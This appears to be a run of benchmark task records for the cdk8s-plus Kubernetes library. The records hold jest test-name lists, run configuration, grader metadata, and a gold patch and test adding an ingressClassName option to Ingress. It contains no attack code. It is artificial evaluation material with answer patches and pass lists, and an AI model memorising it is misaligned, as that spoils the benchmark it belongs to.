scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "can be imported", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "default security context", "custom security context", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses", "custom configuration", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "seccompProfile localhostProfile can not be used if type is not Localhost", "seccompProfile localhostProfile must only be set if type is Localhost", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom" ]
No new interfaces are introduced.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 10, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "B6", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": true }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/4483", "https://github.com/sqren/backport", "https://kubernetes.io/docs/concepts/workloads/pods/sidecar-containers/#differences-from-init-containers" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue aims to backport a fix that permits sidecar containers to have probes, but it does not describe how a sidecar is identified (the tests rely on init containers with restartPolicy=Always). The tests correctly assert that probes are now allowed for such containers, matching the intended behavior, yet the issue statement lacks this crucial detail, making the required knowledge implicit. This signals an IMPLICIT_KNOWLEDGE problem (B6).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
4922c60bbff6814fc3571079417990d90a57019d
2024-02-22 14:48:47
cdk8s-team__cdk8s-plus-3764
diff --git a/src/ingress.ts b/src/ingress.ts index 09bfceb7..983ddbbf 100644 --- a/src/ingress.ts +++ b/src/ingress.ts @@ -40,6 +40,14 @@ export interface IngressProps extends base.ResourceProps { * extension, if the ingress controller fulfilling the ingress supports SNI. */ readonly tls?: IngressTls[]; + + /** + * Class Name for this ingress. + * + * This field is a reference to an IngressClass resource that contains + * additional Ingress configuration, including the name of the Ingress controller. + */ + readonly className?: string; } /** @@ -90,6 +98,7 @@ export class Ingress extends base.Resource { metadata: props.metadata, spec: { defaultBackend: Lazy.any({ produce: () => this._defaultBackend?._toKube() }), + ingressClassName: props.className, rules: Lazy.any({ produce: () => this.synthRules() }), tls: Lazy.any({ produce: () => this.tlsConfig() }), },
fix(ingress): add `ingressClassName` to `IngressProps` (#2964) # Backport This will backport the following commits from `k8s-27/main` to `k8s-25/main`: - [fix(ingress): add `ingressClassName` to `IngressProps` (#2964)](https://github.com/cdk8s-team/cdk8s-plus/pull/2964) <!--- Backport version: 8.5.0 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Expose `ingressClassName` via Ingress properties **Problem** The library’s Ingress construct did not provide a way to specify the Kubernetes `ingressClassName`, preventing users from selecting a particular IngressClass or controller. **Root Cause** The Ingress property model omitted the class name field and consequently never populated the corresponding spec attribute. **Fix / Expected Behavior** - Introduce an optional class name property to the Ingress configuration interface. - Document the property as a reference to an IngressClass resource. - When the property is set, render it as `ingressClassName` in the generated Ingress manifest. - Omit the field from the manifest when the property is not provided, preserving existing output. - Maintain type safety and alignment with the upstream Kubernetes API. **Risk & Validation** - The addition is backward‑compatible because the new property is optional. - Verify through unit tests that the manifest includes `ingressClassName` only when the property is supplied. - Run the full test suite to confirm no regressions in other Ingress behavior.
3,764
cdk8s-team/cdk8s-plus
diff --git a/test/ingress.test.ts b/test/ingress.test.ts index 8f79dc36..65b63503 100644 --- a/test/ingress.test.ts +++ b/test/ingress.test.ts @@ -12,6 +12,36 @@ test('defaultChild', () => { }); +test('IngressClassName can be set', () => { + // GIVEN + const chart = Testing.chart(); + const service = new Service(chart, 'my-service', { ports: [{ port: 80 }] } ); + + // WHEN + new Ingress(chart, 'my-ingress', { + defaultBackend: IngressBackend.fromService(service), + className: 'myIngressClassName', + }); + + // THEN + expect(Testing.synth(chart).filter(x => x.kind === 'Ingress')).toStrictEqual([ + { + apiVersion: 'networking.k8s.io/v1', + kind: 'Ingress', + metadata: { name: 'test-my-ingress-c8135042' }, + spec: { + defaultBackend: { + service: { + name: 'test-my-service-c8493104', + port: { number: 80 }, + }, + }, + ingressClassName: 'myIngressClassName', + }, + }, + ]); +}); + describe('IngressBackend', () => { describe('fromService', () => { test('if the service exposes a port, it will be used by the ingress', () => {
[ "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host" ]
[ "defaultChild", "defaults", "can select namespaces", "can select all namespaces", "fromCommand", "fromHttpGet", "fromTcpSocket", "can grant permissions on imported", "custom", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "Can be isolated", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "default configuration", "custom configuration", "Can mutate metadata", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports at instantiation", "cannot add an already existing port number", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined" ]
Method: IngressProps.className (optional property) Location: src/ingress.ts – interface IngressProps extends base.ResourceProps Inputs: className?: string – the name of the IngressClass to associate with the Ingress. Outputs: N/A (the value is emitted as spec.ingressClassName in the synthesized Ingress manifest) Description: Adds an optional className field to IngressProps so callers can specify the ingressClassName of the resulting Kubernetes Ingress resource; when set, the manifest includes spec.ingressClassName with the provided string.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 9, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/2964", "https://github.com/sqren/backport" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding support for `ingressClassName` in IngressProps, which the test verifies by setting `className` and checking the synthesized manifest contains `ingressClassName`. The test directly reflects this requirement, and the needed code change is a straightforward property addition and mapping. No signals of B‑category problems are present. Therefore the task is cleanly solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
f15b7eea1dc24969762326d4dd2bc0eeefc6de4a
2024-02-22 14:48:51
cdk8s-team__cdk8s-plus-3765
diff --git a/src/ingress.ts b/src/ingress.ts index 09bfceb7..983ddbbf 100644 --- a/src/ingress.ts +++ b/src/ingress.ts @@ -40,6 +40,14 @@ export interface IngressProps extends base.ResourceProps { * extension, if the ingress controller fulfilling the ingress supports SNI. */ readonly tls?: IngressTls[]; + + /** + * Class Name for this ingress. + * + * This field is a reference to an IngressClass resource that contains + * additional Ingress configuration, including the name of the Ingress controller. + */ + readonly className?: string; } /** @@ -90,6 +98,7 @@ export class Ingress extends base.Resource { metadata: props.metadata, spec: { defaultBackend: Lazy.any({ produce: () => this._defaultBackend?._toKube() }), + ingressClassName: props.className, rules: Lazy.any({ produce: () => this.synthRules() }), tls: Lazy.any({ produce: () => this.tlsConfig() }), },
fix(ingress): add `ingressClassName` to `IngressProps` (#2964) # Backport This will backport the following commits from `k8s-27/main` to `k8s-26/main`: - [fix(ingress): add `ingressClassName` to `IngressProps` (#2964)](https://github.com/cdk8s-team/cdk8s-plus/pull/2964) <!--- Backport version: 8.5.0 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Add support for specifying an Ingress class name in Ingress constructs **Problem** Consumers could not declare which IngressClass a created Ingress should use, limiting control over the selected controller. The generated manifest therefore always omitted the `ingressClassName` field. **Root Cause** The Ingress construct’s property interface and underlying spec mapping lacked an `ingressClassName` attribute. **Fix / Expected Behavior** - Introduce an optional class name property on the Ingress configuration interface. - Propagate this property into the manifest’s `spec.ingressClassName` field when provided. - Preserve existing behavior when the property is omitted (no `ingressClassName` appears). - Update documentation to describe the new property and its purpose. **Risk & Validation** - Verify that existing manifests remain unchanged when the new property is not used. - Add tests to confirm that the `ingressClassName` field is correctly rendered when set. - Ensure TypeScript type compatibility for downstream projects.
3,765
cdk8s-team/cdk8s-plus
diff --git a/test/ingress.test.ts b/test/ingress.test.ts index 8f79dc36..65b63503 100644 --- a/test/ingress.test.ts +++ b/test/ingress.test.ts @@ -12,6 +12,36 @@ test('defaultChild', () => { }); +test('IngressClassName can be set', () => { + // GIVEN + const chart = Testing.chart(); + const service = new Service(chart, 'my-service', { ports: [{ port: 80 }] } ); + + // WHEN + new Ingress(chart, 'my-ingress', { + defaultBackend: IngressBackend.fromService(service), + className: 'myIngressClassName', + }); + + // THEN + expect(Testing.synth(chart).filter(x => x.kind === 'Ingress')).toStrictEqual([ + { + apiVersion: 'networking.k8s.io/v1', + kind: 'Ingress', + metadata: { name: 'test-my-ingress-c8135042' }, + spec: { + defaultBackend: { + service: { + name: 'test-my-service-c8493104', + port: { number: 80 }, + }, + }, + ingressClassName: 'myIngressClassName', + }, + }, + ]); +}); + describe('IngressBackend', () => { describe('fromService', () => { test('if the service exposes a port, it will be used by the ingress', () => {
[ "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host" ]
[ "can grant permissions on imported", "role can bind to imported", "defaultChild", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "default child", "defaults", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "Can be isolated", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "Synthesizes spec lazily", "default update strategy", "custom update strategy", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload 